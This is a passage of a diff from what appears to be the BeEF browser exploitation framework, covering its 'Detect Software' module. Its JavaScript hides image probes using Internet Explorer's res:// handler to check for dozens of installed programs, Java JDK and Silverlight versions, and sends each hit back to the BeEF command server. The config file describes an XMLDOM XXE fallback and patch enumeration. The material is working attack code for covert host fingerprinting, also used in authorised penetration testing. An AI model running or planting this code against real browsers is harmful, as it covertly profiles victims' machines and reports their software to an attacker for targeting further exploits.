["WPS Office 2009", "Kingsoft\\WPS Office 2009\\utility\\repairinst.exe/16/1"],
["WPS Office 2010", "Kingsoft\\WPS Office 2010\\utility\\repairinst.exe/16/1"],
["WinRar 3.5", "WinRAR\\WinRar.exe/6/90"],
["WinRar 3.6", "WinRAR\\WinRar.exe/6/91"],
["WinRar 3.7", "WinRAR\\WinRar.exe/6/92"],
["WinRar 3.8", "WinRAR\\WinRar.exe/6/93"],
["WinRar 3.9", "WinRAR\\RarExt.d11/24/2"],
["WinZip", "WinZip\\WinZip32.exe/16/1"],
["7zip", "7—Zip\\7zFm.exe/16/1"],
["Adobe Reader 7", "Adobe\\Reader 7.0\\Reader\\AXEParser.d11/16/1"],
["Adobe Professional 7", "Adobe\\Acrobat 7.0\\Acrobat\\Acrobat.dll/16/1"],
["Adobe Reader 8", "Adobe\\Reader 8.0\\Reader\\AdobeXMP.d11/16/1"],
["Adobe Reader 9", "Adobe\\Reader 9.0\\Reader\\AcroRd32.exe/16/1"],
["Adobe Reader 10", "Adobe\\Reader 10.0\\Reader\\AcroRd32.exe/16/1"],
["Skype", "Skype\\Phone\\Skype.exe/16/1"],
["Skype", "Skype\\Phone\\sktransfer.d11/16/1"],
["Microsoft Outlook 6", "Outlook Express\\msimn.exe/16/1"],
["Microsoft Outlook 2000", "Microsoft Office\\OFFICE\\OUTLOOK.EXE/16/1"],
["Microsoft Outlook XP", "Microsoft Office\\OFFICE10\\OUTLOOK.EXE/16/1"],
["Microsoft Outlook 2003", "Microsoft Office\\OFFICE11\\OUTLOOK.EXE/16/1"],
["Microsoft Outlook 2007", "Microsoft Office\\OFFICE12\\OUTLOOK.EXE/16/1"],
["Microsoft Outlook 2010", "Microsoft Office\\OFFICE14\\OUTLOOK.EXE/16/1"],
["Yahoo Messenger", "Yahoo!\\Messenger\\YahooMessenger.exe/16/1"],
["Yahoo Messenger 5", "Yahoo!\\Messenger\\YPager.exe/16/1"],
["Yahoo Messenger 6", "Yahoo!\\Messenger\\asw.d11/16/1"],
["Yahoo Messenger 7", "Yahoo!\\Messenger\\yxtldr.d11/16/1"],
["Yahoo Messenger 8", "Yahoo!\\Messenger\\P2PCE.d11/16/1"],
["Yahoo Messenger 9", "Yahoo!\\Messenger\\GIPSVoiceEngineDLL_MD.d11/16/1"],
["Yahoo Messenger 10", "Yahoo!\\Messenger\\ConnectionWizard.d11/16/1"],
["Flashget", "FlashGet\\flashget.exe/16/1"],
["Flashget", "FlashGet Network\\FlashGet 3\\Flashget3.exe/16/1"],
["Thunder", "Thunder Network\\Thunder\\Thunder.exe/16/1"],
["Thunder", "Thunder Network\\Thunder\\Program\\Thunder.exe/16/1"],
["Thunder", "Thunder Network\\Thunder6\\Thunder.exe/16/1"],
["eMule", "eMule\\emule.exe/16/1"],
["eMule", "easyMule2\\easyMule.exe/16/1"],
["BT", "BitComet\\BitComet.exe/16/1"],
["QDownload", "Tencent\\QQDownload\\QQDownload.exe/16/1"],
["BitSpirit", "BitSpirit\\BitSpirit.exe/16/1"],
["Serv—U", "RhinoSoft.com\\Serv—U\\Serv—U.exe/16/1"],
["radmin", "Radmin\\radmin.exe/16/1"],
// The following signatures were taken from AttackAPI
// https://code.google.com/p/attackapi/source/browse/tags/attackapi-2.5.0b/lib/dom/signatures.js
['L0pht Crack 5', '@stake\\LC5\\lc5.exe/#2/#102'],
['Adobe Acrobat 7', 'adobe\\acrobat 7.0\\acrobat\\acrobat.dll/#2/#210'],
['Ahead Nero', 'ahead\\nero\\nero.exe/#2/NEROSESPLASH'],
['Azureus', 'azureus\\uninstall.exe/#2/#110'],
['Cain', 'cain\\uninstal.exe/#2/#106'],
['Citrix', 'Citrix\\icaweb32\\mfc30.dll/#2/#30989'],
['PGP Desktop', 'PGP Corporation\\PGP Desktop\\PGPdesk.exe/#2/#600'],
['Google Toolbar', 'Google\\googleToolbar1.dll/#2/#120'],
['Flash MX 2004', 'Macromedia\\Flash MX 2004\\flash.exe/#2/#4395'],
['MSN Messenger', 'Messenger\\msmsgs.exe/#2/#607'],
['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7\\console\\7.5.2302.14\\pwresources_zh_tt.dll/#2/#9006'],
['Microsoft Excel 2003', 'Microsoft Office\\Office11\\excel.exe/#34/#904'],
['Microsoft Office 2003', 'Microsoft Office\\Office11\\1033\\MSOhelp.exe/#2/201'],
['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8\\common7\\ide\\devenv.exe/#2/#6606'],
['Microsoft Movie Maker', 'Movie Maker\\moviemk.exe/RT_JPG/sample1'],
['Picasa2', 'picasa2\\picasa2.exe/#2/#138'],
['Quicktime', 'quicktime\\quicktimeplayer.exe/#2/#403'],
['Real VNC4', 'RealVNC\\VNC4\\vncviewer.exe/#2/#120'],
['OLE View', 'Resource Kit\\oleview.exe/#2/#2'],
['Secure CRT', 'SecureCRT\\SecureCRT.exe/#2/#224'],
['Symantec Antivirus', 'symantec_client_security\\symantec antivirus\\vpc32.exe/#2/#157'],
['Ultramon', 'ultramon\\ultramondesktop.exe/#2/#108'],
['VMware Workstation', 'vmware\\vmware workstation\\vmware.exe/#2/#508'],
['Winamp', 'winamp\\winamp.exe/#2/#109'],
['Windows Media Player', 'Windows Media Player\\wmsetsdk.exe/#2/#249']
];
beef.debug("[Detect Software] Enumerating installed software...");
for (var dir=0;dir<program_dirs.length; dir++) {
for (var i=0; i<software.length; i++) {
var img = new Image;
img.title = software[i][0];
img.src = "res://" + drive + ":\\" + program_dirs[dir] + "\\" + software[i][1];
img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); }
img.onerror= function() { dom.removeChild(this); }
dom.appendChild(img);
}
}
// Enumerate Java JDK installs
beef.debug("[Detect Software] Enumerating JDK installs...");
var java_versions = ['1.8.0', '1.7.0', '1.6.0'];
for (var dir=0;dir<program_dirs.length; dir++) {
for (var v=0; v<java_versions.length; v++) {
for (var patch_level=0; patch_level<100; patch_level++) {
var pad = '';
if (patch_level < 10) pad = '0';
var img = new Image;
img.title = "Java JDK" + java_versions[v] + "_" + pad + patch_level;
img.src = "res://" + drive + ":\\" + program_dirs[dir] + "\\Java\\jdk" + java_versions[v] + "_" + pad + patch_level + "\\jre\\bin\\awt.dll/2/CHECK_BITMAP";
img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + this.title); dom.removeChild(this); }
img.onerror= function() { dom.removeChild(this); }
dom.appendChild(img);
}
}
}
// Enumerate Silverlight installs
beef.debug("[Detect Software] Enumerating Silverlight installs...");
var silverlight_versions = [
'5.1.50901.0',
'5.1.50709.0',
'5.1.50428.0',
'5.1.41212.0',
'5.1.41105.0',
'5.1.40728.0',
'5.1.40416.0',
'5.1.31211.0',
'5.1.30514.0',
'5.1.30214.0',
'5.1.20913.0',
'5.1.20513.0',
'5.1.20125.0',
'5.1.10411.0',
'5.0.61118.0',
'5.0.60818.0',
'5.0.60401.0',
'4.1.10329.0',
'4.1.10111.0',
'4.0.60831.0',
'4.0.60531.0',
'4.0.60310.0',
'4.0.60129.0',
'4.0.51204.0',
'4.0.50917.0',
'4.0.50826.0',
'4.0.50524.00',
'4.0.50401.00',
'3.0.50611.0',
'3.0.50106.00',
'3.0.40818.00',
'3.0.40723.00',
'3.0.40624.00',
'2.0.40115.00',
'2.0.31005.00',
'1.0.30715.00',
'1.0.30401.00',
'1.0.30109.00',
'1.0.21115.00',
'1.0.20816.00'
];
for (var dir=0;dir<program_dirs.length; dir++) {
for (var i=0; i<silverlight_versions.length; i++) {
var img = new Image;
img.title = silverlight_versions[i];
img.src = "res://" + drive + ":\\" + program_dirs[dir] + "\\Microsoft Silverlight\\" + silverlight_versions[i] + "\\npctrl.dll/2/102";
img.onload = function() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=Microsoft Silverlight v" + this.title); dom.removeChild(this); }
img.onerror= function() { dom.removeChild(this); }
dom.appendChild(img);
}
}
});

9
modules/host/detect_software/config.yaml
View File

@@ -3,14 +3,15 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
Detect_software:
detect_software:
enable: true
category: "Host"
name: "Detect Software"
description: "Detects software installed on the host (Internet Explorer only)"
authors: ["mh"]
description: "This module attempts to detect software installed on the host by using <a href='https://soroush.secproject.com/blog/2013/04/microsoft-xmldom-in-ie-can-divulge-information-of-local-drivenetwork-in-error-messages/'>Internet Explorer XMLDOM XXE</a> discovered by Soroush Dalili (@irsdl).<br/><br/>If the XMLDOM XXE technique fails, the module falls back to using the 'res' protocol handler to load known resource images from EXE/DLL files.<br/><br/>It also attempts to enumerate installed patches if service pack uninstall files are present on the host (WinXP only)."
authors: ["bcoles"]
target:
working: ["IE"]
not_working: ["All"]
not_working: ["ALL"]

8
modules/host/detect_software/module.rb
View File

@@ -3,12 +3,14 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_software < BeEF::Core::Command
def post_execute
content = {}
content['detect_software'] = @datastore['detect_software']
content['installed_software'] = @datastore['installed_software'] if not @datastore['installed_software'].nil?
content['installed_patches'] = @datastore['installed_patches'] if not @datastore['installed_patches'].nil?
save content
end
end